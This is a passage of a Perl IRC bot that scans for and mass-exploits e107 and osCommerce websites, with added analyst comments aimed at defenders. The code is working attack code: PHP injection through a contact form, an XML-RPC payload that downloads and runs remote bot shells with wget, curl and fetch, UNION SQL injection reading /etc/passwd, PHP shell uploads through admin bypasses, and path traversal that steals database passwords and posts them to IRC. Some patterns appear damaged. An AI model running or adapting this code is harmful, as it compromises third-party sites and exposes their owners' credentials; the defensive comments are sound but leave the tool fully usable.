my $upload = 'if(@copy("'.$injector.'","e107.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","copy.php");@copy("'.$botshell2.'","paste.php");} elseif(@copy("'.$injector.'","e107_themes/e107.php")) { echo "ikhy_dthem";@copy("'.$botshell.'","e107_themes/copy.php");@copy("'.$botshell2.'","e107_themes/paste.php");} elseif(@copy("'.$injector.'","e107_plugins/e107.php")) { echo "ikhy_dplug";@copy("'.$botshell.'","e107_plugins/copy.php");@copy("'.$botshell2.'","e107_plugins/paste.php");} elseif(@copy("'.$injector.'","e107_images/e107.php")) { echo "ikhy_dima";@copy("'.$botshell.'","e107_images/copy.php");@copy("'.$botshell2.'","e107_images/paste.php");}';
my $res = &e107_rce_query($test,encode_base64($upload));
if ($res =~ /c0liSUKSESc0li/) {
&e107xpl1($chan,$site,$engine);
&get_content("http://".$site."copy.php");
&get_content("http://".$site."paste.php");
&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."4e107.php 15(4@".$sys.")(4@7safemode-on)");sleep(2);
&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
}
if ($res =~ /ikhy_dthem/) {
&get_content("http://".$site."e107_themes/copy.php");
&get_content("http://".$site."e107_themes/paste.php");
&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@7safemode-on)");sleep(2);
&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
}
if ($res =~ /ikhy_dplug/) {
&get_content("http://".$site."e107_plugins/copy.php");
&get_content("http://".$site."e107_plugins/paste.php");
&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_plugins/4e107.php 15(4@".$sys.")(4@7safemode-on)");sleep(2);
&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
}
if ($res =~ /ikhy_dima/) {
&get_content("http://".$site."e107_images/copy.php");
&get_content("http://".$site."e107_images/paste.php");
&msg("#HacKeD","$e107logo0,1(4@0SheLL) http://".$site."e107_images/4e107.php 15(4@".$sys.")(4@7safemode-on)");sleep(2);
&msg("Rose","$e107logo0,1(4@0SheLL) http://".$site."e107_themes/4e107.php 15(4@".$sys.")(4@safemode-off)");sleep(2);
}
else {
&msg("$chan","$e107logo0,1(4@0Vuln) ".$test." 15(4@".$sys.")(4@7safemode-on)");sleep(2);
}
} exit; } sleep(2);
}
}
}
}
# POST a form to $url whose author_name field carries [php]...[/php] markup
# around an eval of the base64 text in $code, and return the response body.
#   $_[0] URL to post to, $_[1] base64-encoded PHP code
# The caller e107() builds the URL from the site and $bug (the E107-SQL branch
# of the main loop sets $bug to "contact.php").
# For defenders: the User-Agent is one of the spoofed crawler/browser strings
# in @uagents, so filtering on User-Agent will not catch this; the usable
# signature is the request body, "send-contactus=1&author_name=[php]".
sub e107_rce_query() {
my $url = $_[0];
my $code = $_[1];
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
# The tail is URL-encoded: %3B is ";", %28%29 is "()", %5B%2Fphp%5D is "[/php]".
$req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
# Give up on a target after 7 seconds.
$ua->timeout(7);
my $res = $ua->request($req);
return $res->content;
}
sub e107_spread_query() {
my $url = $_[0];
my $code = "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";
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
}
sub xml() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$xmllogo Scan finish"); }
my $test = "http://".$site.$bug;
my $vuln = "http://".$site."".$bug;
my $html = &get_content($test);
if ($html =~ /faultCode/ ) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $resp = &xml_cek_query($test);
if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
&xml_spread_query($test);sleep(2);
my $sys = $1;
my $check = &get_content("http://".$site."e107.php");
&get_content("http://".$site."copy.php");
&get_content("http://".$site."paste.php");
if ($check =~ /Hacked By Rose/) {
&msg("$chan","$xmllogo15(@SheLL) http://".$site."7e107.php ".$sys);&get_content("http://".$site."copy.php"); sleep(2);}
else {
&msg("$chan","$xmllogo0,1(4@0SysTem)7 ".$vuln." ".$sys); sleep(2);}
}
sleep(2); } exit; } }
}
}
}
# POST a text/xml body to $url that asks the target to run `uname -a` and
# print the output between two "j13mb0t" markers; return the response body.
#   $_[0] URL to post to
# The caller xml() looks for the markers in the response to decide whether the
# target executed the code.
# NOTE(review): the XML body looks incomplete here -- the markup around
# "test.method" appears to have been stripped when the listing was pasted.
# For defenders: the request uses the fixed User-Agent "perl post" with
# Content-Type text/xml, and the body contains the "j13mb0t" marker.
sub xml_cek_query() {
my $url = $_[0];
my $code = "system('uname -a');";
my $ua = LWP::UserAgent->new(agent => 'perl post');
# $exploit is not declared with `my`, so it is a package global.
$exploit = "< ?xml version=\"1.0\"?>";
$exploit .= "test.method";
$exploit .= "',''));";
$exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*";
# Give up on a target after 7 seconds.
$ua->timeout(7);
# POST here is the request constructor exported by HTTP::Request::Common.
my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
return $res->content;
}
sub xml_spread_query() {
my $xmltargt = $_[0];
my $xmlsprd = "system('wget ".$injector." -O e107.php;fetch ".$injector.";mv yahoo.jpg e107.php;wget ".$botshell." -O copy.php;fetch ".$botshell.";mv copy.jpg copy.php;wget ".$botshell2." -O paste.php;fetch ".$botshell2.";mv paste.jpg paste.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php copy.jpg;rm -rf copy.jpg;wget ".$botshell.";php copy.jpg;rm -rf copy.jpg;curl -O ".$botshell.";php copy.jpg;rm -rf copy.jpg;lwp-download ".$botshell.";php copy.jpg;fetch ".$botshell2.";php paste.jpg;rm -rf paste.jpg;wget ".$botshell2.";php paste.jpg;rm -rf paste.jpg;curl -O ".$botshell2.";php paste.jpg;rm -rf paste.jpg;lwp-download ".$botshell2.";php paste.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php copy.jpg;rm -rf copy.jpg;wget ".$botshell.";php copy.jpg;rm -rf copy.jpg;curl -O ".$botshell.";php copy.jpg;rm -rf copy.jpg;lwp-download ".$botshell.";php copy.jpg;fetch ".$botshell2.";php paste.jpg;rm -rf paste.jpg;wget ".$botshell2.";php paste.jpg;rm -rf paste.jpg;curl -O ".$botshell2.";php paste.jpg;rm -rf paste.jpg;lwp-download ".$botshell2.";php paste.jpg;');";
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "< ?xml version=\"1.0\"?>";
$exploit .= "test.method";
$exploit .= "',''));";
$exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*";
$userAgent->timeout(7);
$userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
}
sub sql() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$sqllogo Scan finish"); }
my $test = "http://".$site.$bug."'";
my $vuln = "http://".$site."4".$bug;
my $sqlsite = "http://".$site.$bug;
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
&sqlbrute($sqlsite,$chan,$engine);}
elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
&msg("$chan","$sqllogo0,1(4@0MsSQL) ".$vuln);}
elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
&msg("$chan","$sqllogo0,1(4@0MsAccess) ".$vuln);}
elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
&sqlbrute($sqlsite,$chan,$engine);}
} exit; sleep(2); }
}
}
}
sub sqlbrute() {
my $situs=$_[0];
my $chan =$_[1];
my $engine=$_[2];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
$inyection = '';
$union = '';
}
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
$response=get($sql);
if($response =~ /loginpwnz/)
{
$column ++;
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
&msg("$chan","$sqllogo0,1(4@0SQL) $sql ");
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");
if($response =~ /loginpwnz/)
{
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
&msg("$chan","$sqllogo0,1(4@0SQL)(4@INFO_SCHEMA) $sql ");
}
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
&msg("$chan","$sqllogo0,1(4@0SQL)(4@USER) $sql ");
}
else
{
}
while ($loadcont < $column-1) { $loadfile.=','.'load_file(0x2f6574632f706173737764)'; $loadcont++; } $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin; $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n"); if($response =~ /root:x:/) { &msg("$chan","$sqllogo0,1(4@0SQL)(4@Load File) $sql "); } else { } foreach $tabla(@tabele) { chomp($tabla); $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get tables\n"); if($response =~ /loginpwnz/) { $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin; &msg("$chan","$sqllogo0,1(4@0SQL)(4@Tabel) $sql "); &tabelka($situs,$tabla,$chan,$engine); } } } } } sub tabelka() { my $situs =$_[0]; my $tabla =$_[1]; my $chan =$_[2]; my $engine=$_[3]; my $cfin.="--"; my $cmn.= "+"; chomp($tabla); foreach $columna(@kolumny) { chomp($columna); $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get columns\n"); if ($response =~ /loginpwnz/) { &msg("$chan","$sqllogo0,1(4@0SQL)(4@SQLi Vuln) $situs (4@Kolom) $columna (4@Tabel) $tabla "); } } } sub osco() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo); my $num = scalar(@list); if ($num > 0) {
foreach my $site (@list) {
$count++;
# if ($count == $num-1) { &msg("$chan","$oscologo Scan finish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/file_manager.php/login.php";
my $test2 = "http://".$site."admin/banner_manager.php/login.php";
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ ) {
&msg("$chan","$oscologo0,1(4@0System)7 ".$test);
&osco_xpl($test,$chan,$site,$engine);
&osco2($test1,$chan,$bug,$dork,$engine);
&osco_xpl3($test2,$chan,$site,$engine);
&osql($chan,$site,$engine);
} else { }
} exit; sleep(2); }
}
}
}
# osco_xpl: upload stage of the bot. Appends "?cPath=&action=new_product_preview"
# to the URL it is given and posts four files to it.
# Arguments: $_[0] target URL, $_[1] IRC channel, $_[2] site prefix used to
# build the verification URLs, $_[3] search-engine label. $chan and $engine
# are read but not used below.
#
# Analyst notes for defenders:
#  - Four form-data POSTs send local files (./yahoo.jpg, ./google.jpg,
#    ./copy.jpg, ./paste.jpg) in the 'products_image' field under the upload
#    names log.php, osco.php, copy.php and paste.php. Files with those names
#    under a site's images/ directory are an indicator of compromise.
#  - Web-server logs will show the POST to "...?cPath=&action=new_product_preview"
#    followed by GETs for images/osco.php, images/copy.php and images/paste.php.
#  - Results are announced to the hard-coded "#HacKeD" channel and the nick
#    "Rose", not to $chan.
#  - Hardening that defeats this stage: enforce authentication on the admin
#    directory at the web-server level and refuse PHP execution in
#    upload/image directories.
sub osco_xpl() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?cPath=&action=new_product_preview";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
# Each post() submits one local file under a .php upload name.
my $res = $browser->post( $url,['products_image' => ['./yahoo.jpg' => 'log.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['products_image' => ['./google.jpg' => 'osco.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['products_image' => ['./copy.jpg' => 'copy.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['products_image' => ['./paste.jpg' => 'paste.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
# The response dumps are captured but never inspected.
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
# Only the first get_content() result lands in $check; the other two fetches
# discard their return value.
my $check = &get_content("http://".$site."images/osco.php");&get_content("http://".$site."images/copy.php");&get_content("http://".$site."images/paste.php");sleep(3);
# "Hacked By Rose" is the marker the script expects in the fetched page.
if ($check =~ /Hacked By Rose/) {
my $safe ="";
my $os ="";
my $free ="";
# NOTE(review): the patterns below contain "< \/" sequences and literal line
# breaks that look like HTML-extraction damage in this listing; confirm
# against an original sample before building signatures from them.
# $soft is assigned without "my" and is not used afterwards in this sub.
if ($check =~ m/Software : (.*?)< \/u>< \/b>< \/a>
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)< \/b>< \/font>/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)< \/p>< \/td>< \/tr>/) {$free = $1;}
# NOTE(review): the announced path is images/4osco.php while the file fetched
# above is images/osco.php; the "4" is presumably a leftover IRC colour digit
# whose control character was stripped from this listing.
&msg("#HacKeD","$oscologo0,1(4@0SHeLL) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);
&msg("Rose","$oscologo0,1(4@0SHeLL) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);
}
}
# osco2: scan driver. Asks search_engine() for candidate sites, fetches
# site+$bug for each one and, when the page contains the string
# TABLE_HEADING_FILENAME, runs the three upload subs and osql() against it.
# Arguments: $_[0] IRC channel, $_[1] path suffix to probe, $_[2] search
# query, $_[3] search-engine label.
#
# Analyst notes for defenders:
#  - The probe URLs end in "admin/<script>.php/login.php" (banner_manager.php
#    and categories.php here). Requests for an admin script with "/login.php"
#    appended as trailing path info are a high-signal access-log pattern.
#  - TABLE_HEADING_FILENAME is presumably an admin-page string the script
#    treats as proof it reached the page without a session; confirm against
#    the targeted application.
sub osco2() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
# $count is incremented but only referenced by the disabled line below.
$count++;
# if ($count == $num-1) { &msg("$chan","$oscologo Scan finish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/banner_manager.php/login.php";
my $test2 = "http://".$site."admin/categories.php/login.php";
my $html = &get_content($test);
# Double fork: the parent waits for the first child, the first child forks
# again and exits, and the grandchild does the work below.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /TABLE_HEADING_FILENAME/) {
&msg("$chan","$oscologo(0$engine0)0(110System0)0 ".$test);
&osco_xpl2($test,$chan,$site,$engine);
&osco_xpl3($test1,$chan,$site,$engine);
&osco_xpl($test2,$chan,$site,$engine);
&osql($chan,$site,$engine);
} else { }
# The sleep(2) after exit is never reached.
} exit; sleep(2); }
}
}
}
# osco_xpl2: same upload-and-verify routine as osco_xpl, but it appends
# "?action=processuploads" to the URL and uses the form field 'file_1'.
# Arguments: $_[0] target URL, $_[1] IRC channel, $_[2] site prefix, $_[3]
# search-engine label. $chan and $engine are read but not used below.
#
# Analyst notes for defenders:
#  - Look for POSTs carrying "?action=processuploads" followed by GETs for
#    images/osco.php, images/copy.php and images/paste.php.
#  - Dropped file names are log.php, osco.php, copy.php and paste.php.
#  - Results go to the hard-coded "#HacKeD" channel and the nick "Rose".
sub osco_xpl2() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?action=processuploads";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
# Each post() submits one local file under a .php upload name.
my $res = $browser->post( $url,['file_1' => ['./yahoo.jpg' => 'log.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['file_1' => ['./google.jpg' => 'osco.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['file_1' => ['./copy.jpg' => 'copy.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['file_1' => ['./paste.jpg' => 'paste.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
# The response dumps are captured but never inspected.
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
# Only the images/osco.php response is kept; the other two fetches discard
# their return value.
my $check = &get_content("http://".$site."images/osco.php");&get_content("http://".$site."images/copy.php");&get_content("http://".$site."images/paste.php");sleep(3);
if ($check =~ /Hacked By Rose/) {
my $safe ="";
my $os ="";
my $free ="";
# NOTE(review): the "< \/" sequences and literal line breaks inside these
# patterns look like HTML-extraction damage in this listing; confirm against
# an original sample before building signatures from them.
if ($check =~ m/Software : (.*?)< \/u>< \/b>< \/a>
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)< \/b>< \/font>/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)< \/p>< \/td>< \/tr>/) {$free = $1;}
# NOTE(review): announced path is images/4osco.php, fetched path is
# images/osco.php; the "4" is presumably a stripped IRC colour code.
&msg("#HacKeD","$oscologo0,1(4@0SHeLL) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);
&msg("Rose","$oscologo0,1(4@0SHeLL) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);
}
}
# osco3: scan driver with the same shape as osco2. It probes site+$bug and
# proceeds when the response contains TABLE_HEADING_BANNERS.
# Arguments: $_[0] IRC channel, $_[1] path suffix to probe, $_[2] search
# query, $_[3] search-engine label.
#
# Analyst note for defenders: the follow-up URLs are
# "admin/file_manager.php/login.php" and "admin/categories.php/login.php";
# an admin script name followed by "/login.php" in the request path is the
# log pattern to alert on.
sub osco3() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
# $count is incremented but only referenced by the disabled line below.
$count++;
# if ($count == $num-1) { &msg("$chan","$oscologo Scan finish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/file_manager.php/login.php";
my $test2 = "http://".$site."admin/categories.php/login.php";
my $html = &get_content($test);
# Double fork: the parent waits for the first child, the first child forks
# again and exits, and the grandchild does the work below.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /TABLE_HEADING_BANNERS/) {
&msg("$chan","$oscologo0,1(4@0System)7 ".$test);
&osco_xpl3($test,$chan,$site,$engine);
&osco_xpl2($test1,$chan,$site,$engine);
&osco_xpl($test2,$chan,$site,$engine);
&osql($chan,$site,$engine);
} else { }
# The sleep(2) after exit is never reached.
} exit; sleep(2); }
}
}
}
# osco_xpl3: same upload-and-verify routine as osco_xpl and osco_xpl2, but it
# appends "?action=insert" to the URL and uses the form field 'banners_image'.
# Arguments: $_[0] target URL, $_[1] IRC channel, $_[2] site prefix, $_[3]
# search-engine label. $chan and $engine are read but not used below.
#
# Analyst notes for defenders:
#  - Look for POSTs carrying "?action=insert" to a banner-management URL,
#    followed by GETs for images/osco.php, images/copy.php, images/paste.php.
#  - Dropped file names are log.php, osco.php, copy.php and paste.php.
#  - The IRC announcement uses the tag "SHeLLx" here, where the other two
#    upload subs use "SHeLL".
sub osco_xpl3() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?action=insert";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
# Each post() submits one local file under a .php upload name.
my $res = $browser->post( $url,['banners_image' => ['./yahoo.jpg' => 'log.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['banners_image' => ['./google.jpg' => 'osco.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['banners_image' => ['./copy.jpg' => 'copy.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['banners_image' => ['./paste.jpg' => 'paste.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
# The response dumps are captured but never inspected.
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
# Only the images/osco.php response is kept; the other two fetches discard
# their return value.
my $check = &get_content("http://".$site."images/osco.php");&get_content("http://".$site."images/copy.php");&get_content("http://".$site."images/paste.php");sleep(3);
if ($check =~ /Hacked By Rose/) {
my $safe ="";
my $os ="";
my $free ="";
# NOTE(review): the "< \/" sequences and literal line breaks inside these
# patterns look like HTML-extraction damage in this listing; confirm against
# an original sample before building signatures from them.
if ($check =~ m/Software : (.*?)< \/u>< \/b>< \/a>
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)< \/b>< \/font>/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)< \/p>< \/td>< \/tr>/) {$free = $1;}
# NOTE(review): announced path is images/4osco.php, fetched path is
# images/osco.php; the "4" is presumably a stripped IRC colour code.
&msg("#HacKeD","$oscologo0,1(4@0SHeLLx) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);
&msg("Rose","$oscologo0,1(4@0SHeLLx) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);
}
}
# osql: requests the shop's includes/configure.php through the admin file
# manager's download action and, if the response contains "http://", passes
# the same URL to osql_xpl() for credential extraction.
# Arguments: $_[0] IRC channel, $_[1] site prefix, $_[2] search-engine label
# (read but unused).
#
# Analyst notes for defenders:
#  - The exact request to search for in access logs is
#    "admin/file_manager.php/login.php?action=download&filename=/includes/configure.php".
#  - A successful response to that request means the database credentials in
#    configure.php must be treated as disclosed and rotated.
sub osql() {
my $chan = $_[0];
my $site = $_[1];
my $engine = $_[2];
my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
my $re = &get_content($test);
# The "http://" test is only a coarse check that something resembling the
# config file came back.
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}
# osql_xpl: fetches $url again (10 second timeout) and, on an HTTP success,
# pulls five configuration values out of the response and posts each one to
# the IRC channel.
# Arguments: $_[0] URL to fetch, $_[1] IRC channel, $_[2] site prefix used in
# the message text.
#
# Analyst notes for defenders:
#  - Values extracted: DIR_FS_CATALOG, DB_SERVER, DB_SERVER_USERNAME,
#    DB_SERVER_PASSWORD and DB_DATABASE, i.e. the filesystem path and the
#    full database login of the shop.
#  - The values are relayed as PRIVMSG text, so anyone present in the channel
#    receives them; rotation of the database password is required after any
#    hit, not just removal of the bot.
sub osql_xpl() {
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $request = HTTP::Request->new(GET=>$url);
my $browser = LWP::UserAgent->new();
$browser->timeout(10);
my $response = $browser->request($request);
if ($response->is_success) {
# as_string includes the response headers as well as the body.
my $res = $response->as_string;
# Each pattern captures with a greedy (.*) between single quotes on one line.
if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
&msg("$chan","$ossqllogo(4@VULN)15 http://".$site." [+]DIR path: 4 $1");
}
if ($res =~ m/'DB_SERVER', '(.*)'/g) {
&msg("$chan","$ossqllogo(4@VULN)15 http://".$site." [+]DB Server: 4 $1");
}
if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
&msg("$chan","$ossqllogo(4@VULN)15 http://".$site." [+]DB username: 4 $1");
}
if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
&msg("$chan","$ossqllogo(4@VULN)15 http://".$site." [+]DB password: 4 $1");
}
if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
&msg("$chan","$ossqllogo(4@VULN)15 http://".$site." [+]DB database: 4 $1");
}
}
}
# oscoQ: search-driven variant of osql(). For every site returned by
# search_engine() it requests includes/configure.php through the admin file
# manager download action and hands hits to osql_xpl().
# Arguments: $_[0] IRC channel, $_[1] path suffix (passed to search_engine
# only), $_[2] search query, $_[3] search-engine label.
#
# Analyst note for defenders: unlike the osco* drivers this loop does not
# fork, so requests to the targets are issued one after another from the same
# process.
sub oscoQ() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$ossqllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
# The "Scan finish" notice is sent when the counter reaches $num-1.
if ($count == $num-1) { &msg("$chan","$ossqllogo Scan finish"); }
my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}
}
}
# e107xpl1: requests e107_config.php through the my_gallery plugin's
# image.php using a "../../" path in the file parameter, and passes the URL
# to osql_xpl() when the response contains "http://".
# Arguments: $_[0] IRC channel, $_[1] site prefix, $_[2] search-engine label
# (read but unused).
#
# Analyst notes for defenders:
#  - Access-log pattern:
#    "e107_plugins/my_gallery/image.php?file=../../e107_config.php".
#  - Any "file=" parameter containing "../" on that script should be blocked
#    and alerted on; removing or updating the plugin closes the read.
sub e107xpl1() {
my $chan = $_[0];
my $site = $_[1];
my $engine = $_[2];
my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e107_config.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}
# e107xpl: search-driven scan for the my_gallery file-read. For every site
# returned by search_engine() it requests e107_config.php via image.php and,
# when the response contains "http://", announces the URL and calls
# e107_cuk() to extract the database settings.
# Arguments: $_[0] IRC channel, $_[1] path suffix (passed to search_engine
# only), $_[2] search query, $_[3] search-engine label.
#
# Analyst note for defenders: the request to look for is
# "e107_plugins/my_gallery/image.php?file=../../e107_config.php"; a 200
# response to it means the site's database credentials were exposed.
sub e107xpl() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$e107logosql);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
# The "Scan finish" notice is sent when the counter reaches $num-1.
if ($count == $num-1) { &msg("$chan","$e107logosql Scan finish"); }
my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e107_config.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
&msg("$chan","$e107logosql0,1(4@0System)7 ".$test);
&e107_cuk($test,$chan,$site);
}
}
}
}
# e107_cuk: fetches $url (10 second timeout) and, on an HTTP success, extracts
# four database settings from the response and posts each to the IRC channel.
# Arguments: $_[0] URL to fetch, $_[1] IRC channel, $_[2] site prefix used in
# the message text.
#
# Analyst notes for defenders:
